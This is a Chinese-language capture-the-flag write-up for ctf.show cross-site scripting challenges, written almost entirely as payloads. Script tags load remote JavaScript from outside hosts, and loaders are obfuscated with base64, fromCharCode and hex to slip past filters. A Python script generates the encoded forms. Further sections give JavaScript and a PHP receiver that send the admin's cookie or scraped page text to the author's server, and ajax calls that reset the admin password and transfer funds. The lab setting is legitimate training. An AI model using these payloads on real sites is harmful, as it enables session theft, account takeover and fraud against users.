文章目錄
- 前言
- web316
- web317-319
- 前面某些題梭哈
- web320
- web321
- web322-324過濾了;
- web325過濾了.
- 前面那個String.fromCharCode生産payload
- web327
- web328
- web329
- web320
- web331
- web322-323
- 參考連結
前言
以下需要師父們自己url解碼哦,然後大部分使用了xss平台盲打連接配接最下方也有,過濾空格用/,師傅們注意這可能不是一篇WP,我之前忘記備份了嗚嗚,湊合着用一下,相關原理自己琢磨下
web316
http://e6e20854-17e6-4e0e-9f6f-b3c7e176250c.chall.ctf.show/?msg=%3Cscript+src%3D%22http%3A%2F%2Fy4tacker.top%2Fhack.js%22%3E%3C%2Fscript%3E
web317-319
http://35ac8af3-3eaa-4b9c-98cc-0b78d38e6706.chall.ctf.show/?msg=%3Cinput+onfocus%3Deval%28atob%28this.id%29%29+id%3DdmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHA6Ly95NHRhY2tlci50b3AvaGFjay5qcyI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs%3D+autofocus%3E
前面某些題梭哈
<input οnfοcus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzOC5jYy8ySEpJIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== autofocus>
web320
http://cc9e301d-d32a-4540-932a-6cd28d5d5acc.chall.ctf.show/?msg=<body/οnlοad=“document.write(String.fromCharCode(32,60,115,67,114,73,112,116,32,115,114,67,61,47,47,120,115,46,115,98,47,89,84,85,104,62,60,47,115,67,82,105,112,84,62));”
web321
http://cc9e301d-d32a-4540-932a-6cd28d5d5acc.chall.ctf.show/?msg=<body/οnlοad=“document.write(String.fromCharCode(32));document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(114));document.write(String.fromCharCode(73));document.write(String.fromCharCode(112));document.write(String.fromCharCode(116));document.write(String.fromCharCode(32));document.write(String.fromCharCode(115));document.write(String.fromCharCode(114));document.write(String.fromCharCode(67));document.write(String.fromCharCode(61));document.write(String.fromCharCode(47));document.write(String.fromCharCode(47));document.write(String.fromCharCode(120));document.write(String.fromCharCode(115));document.write(String.fromCharCode(46));document.write(String.fromCharCode(115));document.write(String.fromCharCode(98));document.write(String.fromCharCode(47));document.write(String.fromCharCode(89));document.write(String.fromCharCode(84));document.write(String.fromCharCode(85));document.write(String.fromCharCode(104));document.write(String.fromCharCode(62));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(82));document.write(String.fromCharCode(105));document.write(String.fromCharCode(112));document.write(String.fromCharCode(84));document.write(String.fromCharCode(62));”
web322-324過濾了;
<body/οnlοad=‘document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(114));document.write(String.fromCharCode(73));document.write(String.fromCharCode(112));document.write(String.fromCharCode(116));document.write(String.fromCharCode(32));document.write(String.fromCharCode(115));document.write(String.fromCharCode(114));document.write(String.fromCharCode(67));document.write(String.fromCharCode(61));document.write(String.fromCharCode(47));document.write(String.fromCharCode(47));document.write(String.fromCharCode(120));document.write(String.fromCharCode(115));document.write(String.fromCharCode(46));document.write(String.fromCharCode(115));document.write(String.fromCharCode(98));document.write(String.fromCharCode(47));document.write(String.fromCharCode(89));document.write(String.fromCharCode(84));document.write(String.fromCharCode(85));document.write(String.fromCharCode(104));document.write(String.fromCharCode(62));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(82));document.write(String.fromCharCode(105));document.write(String.fromCharCode(112));document.write(String.fromCharCode(84));document.write(String.fromCharCode(62));’>
web325過濾了.
<body/οnlοad=eval("\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x28\x36\x30\x2c\x31\x31\x35\x2c\x36\x37\x2c\x31\x31\x34\x2c\x37\x33\x2c\x31\x31\x32\x2c\x31\x31\x36\x2c\x33\x32\x2c\x31\x31\x35\x2c\x31\x31\x34\x2c\x36\x37\x2c\x36\x31\x2c\x34\x37\x2c\x34\x37\x2c\x31\x32\x30\x2c\x31\x31\x35\x2c\x34\x36\x2c\x31\x31\x35\x2c\x39\x38\x2c\x34\x37\x2c\x38\x39\x2c\x38\x34\x2c\x38\x35\x2c\x31\x30\x34\x2c\x36\x32\x2c\x36\x30\x2c\x34\x37\x2c\x31\x31\x35\x2c\x36\x37\x2c\x38\x32\x2c\x31\x30\x35\x2c\x31\x31\x32\x2c\x38\x34\x2c\x36\x32\x29\x29\x3b")>
web326過濾了括号
<body/οnlοad=eval("\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x28\x36\x30\x2c\x31\x31\x35\x2c\x36\x37\x2c\x31\x31\x34\x2c\x37\x33\x2c\x31\x31\x32\x2c\x31\x31\x36\x2c\x33\x32\x2c\x31\x31\x35\x2c\x31\x31\x34\x2c\x36\x37\x2c\x36\x31\x2c\x34\x37\x2c\x34\x37\x2c\x31\x32\x30\x2c\x31\x31\x35\x2c\x34\x36\x2c\x31\x31\x35\x2c\x39\x38\x2c\x34\x37\x2c\x38\x39\x2c\x38\x34\x2c\x38\x35\x2c\x31\x30\x34\x2c\x36\x32\x2c\x36\x30\x2c\x34\x37\x2c\x31\x31\x35\x2c\x36\x37\x2c\x38\x32\x2c\x31\x30\x35\x2c\x31\x31\x32\x2c\x38\x34\x2c\x36\x32\x29\x29\x3b")>
前面那個String.fromCharCode生産payload
a= "<sCrIpt srC=//xs.sb/YTUh></sCRipT>"
res = ''
res2 = ''
for i in a:
tmp = ord(i)
res += str(tmp)
res+=","
res2 +=f"document.write(String.fromCharCode({str(tmp)}));"
# print(res)
# print(res2)
a = "646f63756d656e742e777269746528537472696e672e66726f6d43686172436f64652836302c3131352c36372c3131342c37332c3131322c3131362c33322c3131352c3131342c36372c36312c34372c34372c3132302c3131352c34362c3131352c39382c34372c38392c38342c38352c3130342c36322c36302c34372c3131352c36372c38322c3130352c3131322c38342c363229293b"
z = 0
res = ''
for i in a:
if z ==2:
z=0
if z ==0:
res+=r"\x"
res += i
z+=1
print(res)
web327
注意收件人是admin,無過濾
web328
自己搭建,主要是偷管理者的cookie
寫一個js
var img = new Image();
img.src = "http://y4tacker.top/index.php?q="+document.cookie
document.body.append(img);
下面是index.php
<?php
$cookie = $_GET['q'];
$myFile = "cookie.txt";
file_put_contents($myFile, $cookie, FILE_APPEND);
?>
注冊
<script src=你的js位址></script>
之後把這個cookie替換掉浏覽器裡面本身的,通路使用者管理頁面就可以了
web329
從這道題以後,群主設定了把cookie發送給你之前就讓它失效了,是以換一個思路擷取頁面元素
自己搭建
var img = new Image();
img.src = “http://y4tacker.top/index.php?q=”+document.querySelector(’#top > div.layui-container > div:nth-child(4) > div > div.layui-table-box > div.layui-table-body.layui-table-main’).textContent;
document.body.append(img); <?php $cookie = $_GET['q']; $myFile = "cookie.txt"; file_put_contents($myFile, $cookie, FILE_APPEND); ?>
web320
通過上一道題發現密碼是admin*******是以改密碼吧
$.ajax({url:“http://127.0.0.1/api/change.php?p=111111”,success:function(result){}});
web331
$.ajax({
url: “http://127.0.0.1/api/change.php”,
method: “POST”,
data:{
‘p’:‘111111’
},
cache: false,
success: function(res){}});
web322-323
一個是get請求,一個是post請求,payload類似web331,主要是向admin那裡轉賬到自己注冊的新号,然後去買flag就行了,當然你們可以發現題目其實有個小漏洞,自己向自己轉錢錢也還會越來越多
$.ajax({
url: "http://127.0.0.1/api/amount.php",
method: "POST",
data:{
'u':'y4tacker',
'a':10000
},
cache: false,
success: function(res){
}});